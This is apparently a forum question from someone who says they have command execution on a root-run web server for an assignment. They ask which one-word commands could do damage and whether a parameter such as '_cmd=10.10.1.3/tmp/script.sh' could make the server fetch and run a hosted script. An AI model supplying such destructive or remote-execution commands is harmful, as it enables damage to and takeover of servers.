Hi I'm trying to hack a web server as part of an assignment and have gotten it to exec commands but I cannot pass commands arguments as the program splits up space separated words and only execs the first one. Is there anything I can pass to cause any sort of damage in one word? Btw webserver runs as root.
Also is it possible to host a script and just pass the location of that to the web server? Eg &_cmd=10.10.1.3/tmp/script.sh&blahblah
Would that work?
Thanks